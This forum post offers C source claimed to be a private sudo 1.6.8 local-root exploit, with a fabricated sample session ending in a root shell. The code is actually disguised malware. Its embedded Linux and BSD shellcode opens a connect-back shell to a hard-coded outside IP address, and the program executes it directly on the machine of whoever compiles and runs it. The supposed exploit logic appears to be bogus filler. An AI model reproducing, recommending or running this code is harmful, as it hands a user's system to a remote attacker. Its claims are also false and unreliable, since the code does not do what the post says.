Jump to content
kw3rln

Priv8 Version of local exploit SUDO

By kw3rln, in Exploituri

Recommended Posts

kw3rln Newbie

kw3rln

Posted
Posted 
/**************************************************************
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE

* sudo 1.6.8p9 - p12+++ local root
* by HST - Hezuah Security Team Iran
*
* PRIVATE --- DO NOT DISTRIBUTE
*
* Use sudo's use insecure temp file to feed
* buffer overflow. Exploitation:
* izik's method of using JMP %ESP for
* linux-gate.so.1. Searches for JMP %ESP, very
* reliable. But exploit works for *BSD,
* but you have to modify -g to get work.
* Values of 0xbf0caa2b for FreeBSD 6 work.
*
* $ ./spwn -f /tmp/fakefile
* [+] Starting up...
* [+] Finding offset
* [+] Found JMP %ESP @ 0xffffe75f
* [+] Calculating header
* [+] Child calculations
* [+] Writing malicious tmp file
* [+] Getting child offset
* [+] Final value for offset: 0xffffe75f
* # whoami
* root
* #
*
* or ./spwn -f /tmp/fakefile -g 0xbf0caa2b
*
*
* linux-gate: [url]http://www.milw0rm.com/papers/55[/url]
*
* ~censored~ whitehats - hack the planet: #hezuah

PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
**************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/utsname.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/time.h>
#include <time.h>

unsigned char lincode[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x42\x0b\x75\xb6\x66\x68"
"\x23\x29\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

unsigned char bsdcode[] =
"\x6a\x61\x58\x99\x52\x42\x52\x42\x52\x68\x42\x0b\x75\xb6\xcd\x80"
"\x68\x10\x02\x23\x29\x89\xe1\x6a\x10\x51\x50\x51\x97\x6a\x62\x58"
"\xcd\x80\x6a\x02\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53"
"\xb0\x3b\xcd\x80";

#define OS_LINUX 0
#define OS_BSD 1
#define CMD "/bin/sh"

int OS;
char **k;
unsigned long BSDoffset;

//sighandler_t sighandle(int a)
//{
// return;
//}

unsigned long find_esp(unsigned long offset) {
int i;
char *ptr = (char *) offset;

for (i = 0; i < 4095; i++) {
if (ptr[i] == '\xff' && ptr[i+1] == '\xe4') {
printf("[+] Found JMP %%ESP @ 0x%08x\n", ptr+i);
return (unsigned long) ptr+i;
}
}

printf("[-] Didn't find JMP %%ESP, but trying anyway...\n");
return ((unsigned long)ptr);
/* sometimes this actually works, why? */
}

void revert(char *p,unsigned int size)
{
char *ptr = p;
int i = 0;
char *q = p + size; //end

for(; p <= q; p +=4)
{
*p ^= *(p+3);
*(p+3) ^= *p;
*p ^= *(p+3);

*(p+1) ^= *(p+2);
*(p+2) ^= *(p+1);
*(p+1) ^= *(p+2);
}
}

void set_bytes(char *o, long word)
{
o[0]=word&0xff;
o[1]=(word>>8)& 0xff;
o[2]=(word>>16)&0xff;
o[3]=(word>>24)&0xff;
}

char *sudo_own(char *file, unsigned long offset,int mode,int ovr)
{
char *own = NULL;
char *file_ = calloc(strlen(file) + 20,sizeof(char));
int (*get_bytes)();
int cnt = 0;
int fp;
struct timeval tv;

if(offset & 0xffff != 0xe000 || offset & 0xffff0000 != 0xffff0000)
offset = 037777760000;
printf("[+] Starting up...\n");

if(OS == OS_LINUX)
{
own = malloc(sizeof(lincode) + 25);
memcpy(own+24,lincode,sizeof(lincode)); get_bytes = (int(*)())lincode;
}
else
{
own = malloc(sizeof(bsdcode) + 25);
memcpy(own+24,bsdcode,sizeof(bsdcode)); get_bytes = (int(*)())bsdcode;
}

printf("[+] Finding offset\n");
memcpy(own+4,&offset,sizeof(unsigned long));
set_bytes(own + 4,offset);

printf("[+] Calculating header\n");
for(cnt = 0; cnt < 16; cnt++)
own[cnt] += (offset ^ 0xff & cnt);
revert(own,cnt);

strcpy(own + 16,file);

if(!fork())
{
cnt = 0;
//signal(1,sighandle); signal(2,sighandle);
printf("[+] Child calculations\n");
gettimeofday(&tv,NULL);
tv.tv_sec &= 0xfffffe00;
snprintf(file_,strlen(file) + 20,"%s.%d.%d",file,getuid() + ovr,tv.tv_sec);
if((fp = open(file_,O_CREAT | O_EXCL)) == -1)
_exit(-1);

printf("[+] Writing malicious tmp file\n");
write(fp,own,30);

printf("[+] Getting child offset\n");
close(fp);
offset = get_bytes();

execl("/usr/sbin/sudo","-z","--tmpfile",file,CMD+offset);
}

sleep(1);
printf("[+] Final value for offset: 0x%08x\n",offset);
if(offset % (++cnt * 3))
printf("[-] Improper value for offset, try -g, -t, or -o\n"),exit(0);

return own;
}

int main(int argc, char **argv)
{
int c = 0;
char *file = NULL;
unsigned long offset = 0xffffe000;
struct utsname u;

int t_mode = 0, try_overwrite = 0;
k = argv;

while((c = getopt(argc,argv,"hvf:g:to")) != -1)
{
switch(c)
{
case 'h':
case 'v':
printf("~censored~ read the source code\n");
exit(0);
case 'f':
file = optarg;
break;
case 'g':

offset = strtoul(optarg+2,NULL,16);
break;
case 't':
t_mode = 1;
break;
case 'o':
try_overwrite = 1;
break;
default:
goto START;
}
}
START:
if(file == NULL)
fprintf(stderr,"specify a file with -f\n"),exit(-1);

uname(&u);
if(strstr(u.sysname,"BSD") != NULL)
OS = OS_BSD;
else
OS = OS_LINUX;

execl("/usr/sbin/sudo","-b","-z",
sudo_own(file,offset,t_mode,try_overwrite));
perror("execl");

return 0;
}

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...